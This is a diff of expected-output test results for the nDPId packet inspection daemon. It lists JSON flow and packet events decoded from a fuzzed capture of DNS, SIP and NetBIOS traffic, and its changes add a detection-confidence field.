 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":258,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470092317,"flow_last_seen":1120470092317,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470092317,"l3_proto":"ip4","src_ip":"192.98.1.2","dst_ip":"25.168.1.1","src_port":2752,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":258,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":97,"flow_packet_id":1,"flow_last_seen":1120470092317,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120470092317,"pkt":"ADBUADRWAODtAW69CABFAABIaosAAIARTMbAYgECGagBAQrAADUANLk4cMwBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
-00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":258,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470092317,"flow_last_seen":1120470092317,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470092317,"l3_proto":"ip4","src_ip":"192.98.1.2","dst_ip":"25.168.1.1","src_port":2752,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
-00656{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":259,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120470002989,"flow_last_seen":1120470002991,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1120470094861,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2743,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00781{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":258,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":97,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470092317,"flow_last_seen":1120470092317,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470092317,"l3_proto":"ip4","src_ip":"192.98.1.2","dst_ip":"25.168.1.1","src_port":2752,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00682{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":259,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120470002989,"flow_last_seen":1120470002991,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1120470094861,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2743,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":260,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470098867,"flow_last_seen":1120470098867,"flow_idle_time":180000,"flow_min_l4_payload_len":375,"flow_max_l4_payload_len":375,"flow_tot_l4_payload_len":375,"flow_avg_l4_payload_len":375,"midstream":0,"ts_msec":1120470098867,"l3_proto":"ip4","src_ip":"192.169.1.2","dst_ip":"200.68.120.81","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00943{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":260,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":98,"flow_packet_id":1,"flow_last_seen":1120470098867,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":417,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":417,"pkt_l4_len":383,"ts_msec":1120470098867,"pkt":"ADBUADBWAOBxAW69CABFAAGTao0AAIARzIzAqQECyER4URPEE8QBf5mcQ0FOQ0VMIHNpcDo5NzIzOTI4NzA0NEB2b2lwLmJydWp1bGEubmV0IFNJUC8yLjANClZpYTogU0lQLzIuMC9VRFAgMTkyLjE2OC4xLjI7YnJhbmNoPXo5aEc0YktucDEwNKqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq"}
-00619{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":260,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470098867,"flow_last_seen":1120470098867,"flow_idle_time":180000,"flow_min_l4_payload_len":375,"flow_max_l4_payload_len":375,"flow_tot_l4_payload_len":375,"flow_avg_l4_payload_len":375,"midstream":0,"ts_msec":1120470098867,"l3_proto":"ip4","src_ip":"192.169.1.2","dst_ip":"200.68.120.81","src_port":5060,"dst_port":5060,"l4_proto":"udp","ndpi": {"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
+00645{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":260,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470098867,"flow_last_seen":1120470098867,"flow_idle_time":180000,"flow_min_l4_payload_len":375,"flow_max_l4_payload_len":375,"flow_tot_l4_payload_len":375,"flow_avg_l4_payload_len":375,"midstream":0,"ts_msec":1120470098867,"l3_proto":"ip4","src_ip":"192.169.1.2","dst_ip":"200.68.120.81","src_port":5060,"dst_port":5060,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":261,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470100319,"flow_last_seen":1120470100319,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120470100319,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2753,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":261,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":99,"flow_packet_id":1,"flow_last_seen":1120470100319,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"ts_msec":1120470100319,"pkt":"ADBUADRWAODtAW69CABFAABEao4AAIARTMfAqAECwKgBAQrBADUAMNwvSM4AAAABAAAAAAAAATEBMAEwAzEyNwdUbi1hZGRyBGFycGEAAAwAAQ=="}
-00753{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":261,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470100319,"flow_last_seen":1120470100319,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120470100319,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2753,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.tn-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":261,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470100319,"flow_last_seen":1120470100319,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"ts_msec":1120470100319,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2753,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.tn-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
 00526{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":262,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":99,"flow_packet_id":2,"flow_last_seen":1120470100321,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"ts_msec":1120470100321,"pkt":"AODt9W69ADBUADRWCABFAABbAABAAEARtz7AqAEBwKgBAgA1CsEAR76rSM6AAAABAAEAAAAAATEBMAEwAzUyNwdpbi1hZGRyBGFycGEAAAwAAcAMAAwAAQAAJxAACwlsb2NhdGhvc3QA"}
-00763{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":262,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470100319,"flow_last_seen":1120470100321,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1120470100321,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2753,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.527.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}}
+00789{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":262,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":99,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470100319,"flow_last_seen":1120470100321,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1120470100321,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2753,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.527.in-addr.arpa","num_queries":1,"num_answers":1,"reply_code":0,"query_type":12,"rsp_type":12,"rsp_addr":"0.0.0.0"}}
 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":264,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470102883,"flow_last_seen":1120470102883,"flow_idle_time":180000,"flow_min_l4_payload_len":375,"flow_max_l4_payload_len":375,"flow_tot_l4_payload_len":375,"flow_avg_l4_payload_len":375,"midstream":0,"ts_msec":1120470102883,"l3_proto":"ip4","src_ip":"192.86.1.2","dst_ip":"200.68.120.99","src_port":5060,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00944{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":264,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":100,"flow_packet_id":1,"flow_last_seen":1120470102883,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":417,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":417,"pkt_l4_len":383,"ts_msec":1120470102883,"pkt":"ADBUADRWAODtAW69CABFAAGTapAAAIARzInAVgECyER4YxPEE8QBf5mcQ0FOQ0VMIHFpcDo5NzIzOTI4NzCiNEB2b2lwLmJydWp1bGEubmV0IFNJUC8yLjANClZpYTogU0lQLzIuMC9VRFAgMTkyLjE2OC4xLjI7YnJhbmNoPXo5aEc0YktucDEwNDk4NDA1My00NGNlNGE0MTE5Mi4xNjguMS4yO3Jwb3J0DQpGcm9tOiAiYXJpayIgPHNpcD44MTY2NjZAdm9pcC5icnVyanVsYS5uZXQ+O3RxZz02NDMzZWY5DQpUbzogPHNpcDo5NzIzOTI4NzA0NEB2b2lwLmJydWp1bGEubmV0Pg0KQ2FsbC1JRDogMTA1MDkwMjU5LTQ0NmZhZjdhQDE5Mi4xNjguMS4yDQpDc2VxOiAxIENBTkNFTA0KQ29udGVudC1MZW5ndGg6IDANCk1heC1Gb3J3YXJkczogNzANClVzZXItQWdlbnQ6IE5lcm8gU0lQUFMgSVAgUGhvbmUgVmVyc2lvbiAyLjAuNTEuMTYNCo0K"}
 00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":265,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469922894,"flow_last_seen":1120469922894,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470106888,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2684,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":265,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469924897,"flow_last_seen":1120469924897,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470106888,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.17","src_port":2736,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00662{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":265,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1120469540839,"flow_last_seen":1120470066890,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":1342,"flow_avg_l4_payload_len":49,"midstream":0,"ts_msec":1120470106888,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
+00688{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":265,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":27,"flow_first_seen":1120469540839,"flow_last_seen":1120470066890,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":1342,"flow_avg_l4_payload_len":49,"midstream":0,"ts_msec":1120470106888,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":137,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
 00586{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":265,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120469921898,"flow_last_seen":1120469930905,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470106888,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2736,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00586{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":265,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1120470015072,"flow_last_seen":1120470024079,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":220,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470106888,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2744,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
 00407{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":267,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":43690,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"ts_msec":1120470112342,"pkt":"ADBUAKqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="}
@@ -510,98 +510,98 @@
 00557{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":272,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":102,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470114910,"flow_last_seen":1120470114910,"flow_idle_time":600000,"flow_min_l4_payload_len":383,"flow_max_l4_payload_len":383,"flow_tot_l4_payload_len":383,"flow_avg_l4_payload_len":383,"midstream":0,"ts_msec":1120470114910,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"200.68.120.81","l4_proto":118,"flow_datalink":1,"flow_max_packets":3}
 00944{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":272,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":102,"flow_packet_id":1,"flow_last_seen":1120470114910,"flow_idle_time":600000,"pkt_oversize":false,"pkt_caplen":417,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":417,"pkt_l4_len":383,"ts_msec":1120470114910,"pkt":"ADBUADRWAOTtAW69CABFAAGTapgAAIB2zIHAqAECyER4URPEE8QBf5mcQ0FOQ0VMIHNpcDo5NzIzOTI4NzA0NEB2b2lwLmJydWp1bGEu2WV0IFNJUC8yLjANClZpYTogU0lQLzIuMC9VRFAgMTkyLjE2OC4xLjI7YnJhbmNoPXo5aEc0YktucDEwNDk4NDA1My00NGNlNGE0MTE5Mi4xNjguMS4yO3Jwb3J0DQpGcm9tOiAiYXJpayIgPKqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq"}
 00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":273,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":101,"flow_packet_id":2,"flow_last_seen":1120470115340,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"ts_msec":1120470115340,"pkt":"ADBUADRWAODtAW69CABFAABIapkAAIARTLjAqAECwKgBAQrCADUANKwzfc8BAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaVd5AmRrAAAhAAE="}
-00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":273,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470113337,"flow_last_seen":1120470115340,"flow_idle_time":180000,"flow_min_l4_payload_len":9,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1120470115340,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2754,"dst_port":53,"l4_proto":"udp","ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cyberciwy.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
-00659{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":275,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120469938910,"flow_last_seen":1120469938910,"flow_idle_time":180000,"flow_min_l4_payload_len":467,"flow_max_l4_payload_len":467,"flow_tot_l4_payload_len":467,"flow_avg_l4_payload_len":467,"midstream":0,"ts_msec":1120470117343,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.35","src_port":20932,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
+00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":273,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470113337,"flow_last_seen":1120470115340,"flow_idle_time":180000,"flow_min_l4_payload_len":9,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":53,"flow_avg_l4_payload_len":26,"midstream":0,"ts_msec":1120470115340,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2754,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cyberciwy.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
+00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":275,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120469938910,"flow_last_seen":1120469938910,"flow_idle_time":180000,"flow_min_l4_payload_len":467,"flow_max_l4_payload_len":467,"flow_tot_l4_payload_len":467,"flow_avg_l4_payload_len":467,"midstream":0,"ts_msec":1120470117343,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"212.242.33.35","src_port":20932,"dst_port":5060,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SIP","breed":"Acceptable","category":"VoIP"}}
 00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":275,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1120469921898,"flow_last_seen":1120469930905,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":132,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470117343,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2736,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00654{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":275,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120469938907,"flow_last_seen":1120469938908,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1120470117343,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2737,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"DNS","breed":"Acceptable","category":"Network"}}
+00680{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":275,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":62,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1120469938907,"flow_last_seen":1120469938908,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"ts_msec":1120470117343,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2737,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}}
 00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":275,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120469939223,"flow_last_seen":1120469939223,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"ts_msec":1120470117343,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.84.1","src_port":2738,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
-00659{"flow_event_id":4,"flow_event_name":"update","thread_id":0,"packet_id":275,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1120470019512,"flow_last_seen":1120470019512,"flow_idle_time":180000,"flow_min_l4_payload_len":50,"flow_max_l4_payload_len":50,"flow_tot_l4_payload_len":50,"flow_avg_l4_payload_len":50,"midstream":0,"ts_msec":1120470117343,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.255","src_port":88,"dst_port":137,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"NetBIOS","breed":"Acceptable","category":"System"}}
